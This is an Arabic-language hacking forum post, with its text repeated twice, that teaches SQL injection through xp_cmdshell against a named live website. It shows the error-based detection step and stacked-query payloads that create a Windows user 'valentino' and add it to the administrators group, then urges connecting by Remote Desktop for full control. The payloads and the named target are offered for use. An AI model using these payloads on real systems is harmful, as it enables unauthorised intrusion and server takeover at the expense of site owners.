muslim4ever1
15-03-2008, 09:29 AM
سلام عليكم شباب
انهرده هنعمل موضوع جميل عن استخدام داله exec فى sql injection انا كنت عايز اعمل الدرس من زمان بس للاسف مكنتش لاقى سيرفر بيدعم الداله دى لانها اصلا بتجيى مش ديفلت مش مفعله و اللى بيفعلها الادمن لى سببين يا اما انو غبى و مش بيفهم دى بتعمل ايه او انو بيستخدمها فى حاجه معينه عموما هيا خطر جدا على السيرفر علشان كده قليل انك تلاقيها مفعله و انا عامل الدرس ده علشان الناس اللى مش بتحب الsql injection بى حجه انها مش بتطبق اوامر
و الدرس ده هيبقا شرح لى درس http://www.milw0rm.com/video/watch.php?id=70
الموقع المصاب
www.chestergas.com
و المتغير و الملف هما
www.chestergas.com/news.asp?id=1
احنا هنكتشف الثغره بى الريقه العاديه لانها مش blind و بالتالى هتطلع الايرور العادى بتعنا
www.chestergas.com/news.asp?id=1'a
http://img295.imageshack.us/img295/8634/64209260yr9.jpg
طيب اوك كده يبقا احنا شغالين تمام بس مش هنسخدم الطريقه العاديه و نطلع باقى العدد انما هنقفل الامر ده بى ; و نخش على الامر الجديد بتاعنا اللى هوا exec و دلوقتى هنضيف يوزر فى السيرفر
www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net user valentino 123456 /add' ;--
http://img55.imageshack.us/img55/4066/43429212pv3.jpg
اوك مفيش ايرور يبقا الامر اشتغل تمام و نحط اليوزر بالمره فى الادمنز
www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net localgroup administartor valentino /add' ;--
http://img299.imageshack.us/img299/3735/96470154is3.jpg[
تمام كده معاك روت على السيرفر و اتصل بى ريموت ديسك توب و عيش عموما اوامر الexec كتتتتتتتتتتتتتتتتييييييييير اوى و انا كنت مجمع جزء كبير منها فى موضوع فى جورس بس مقفول دلوقتى لما يفتح هبقا اعدل الموضوع و اكتبها و اى حد مش فاهم حاجه يقولى
انا لقيت صعوبه فى انى احط الدرس فى الموقع و ده مش اول درس يرفضو المود سيكيورتى ياريت حد من المشرفين يشوف ايه الاكواد الممنوعه عندى و يعدل الموضوع و يحطو
انهرده هنعمل موضوع جميل عن استخدام داله exec فى sql injection انا كنت عايز اعمل الدرس من زمان بس للاسف مكنتش لاقى سيرفر بيدعم الداله دى لانها اصلا بتجيى مش ديفلت مش مفعله و اللى بيفعلها الادمن لى سببين يا اما انو غبى و مش بيفهم دى بتعمل ايه او انو بيستخدمها فى حاجه معينه عموما هيا خطر جدا على السيرفر علشان كده قليل انك تلاقيها مفعله و انا عامل الدرس ده علشان الناس اللى مش بتحب الsql injection بى حجه انها مش بتطبق اوامر
و الدرس ده هيبقا شرح لى درس http://www.milw0rm.com/video/watch.php?id=70
الموقع المصاب
www.chestergas.com
و المتغير و الملف هما
www.chestergas.com/news.asp?id=1
احنا هنكتشف الثغره بى الريقه العاديه لانها مش blind و بالتالى هتطلع الايرور العادى بتعنا
www.chestergas.com/news.asp?id=1'a
http://img295.imageshack.us/img295/8634/64209260yr9.jpg
طيب اوك كده يبقا احنا شغالين تمام بس مش هنسخدم الطريقه العاديه و نطلع باقى العدد انما هنقفل الامر ده بى ; و نخش على الامر الجديد بتاعنا اللى هوا exec و دلوقتى هنضيف يوزر فى السيرفر
www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net user valentino 123456 /add' ;--
http://img55.imageshack.us/img55/4066/43429212pv3.jpg
اوك مفيش ايرور يبقا الامر اشتغل تمام و نحط اليوزر بالمره فى الادمنز
www.chestergas.com/news.asp?id=1; exec master..xp_cmdshell 'net localgroup administartor valentino /add' ;--
http://img299.imageshack.us/img299/3735/96470154is3.jpg[
تمام كده معاك روت على السيرفر و اتصل بى ريموت ديسك توب و عيش عموما اوامر الexec كتتتتتتتتتتتتتتتتييييييييير اوى و انا كنت مجمع جزء كبير منها فى موضوع فى جورس بس مقفول دلوقتى لما يفتح هبقا اعدل الموضوع و اكتبها و اى حد مش فاهم حاجه يقولى
انا لقيت صعوبه فى انى احط الدرس فى الموقع و ده مش اول درس يرفضو المود سيكيورتى ياريت حد من المشرفين يشوف ايه الاكواد الممنوعه عندى و يعدل الموضوع و يحطو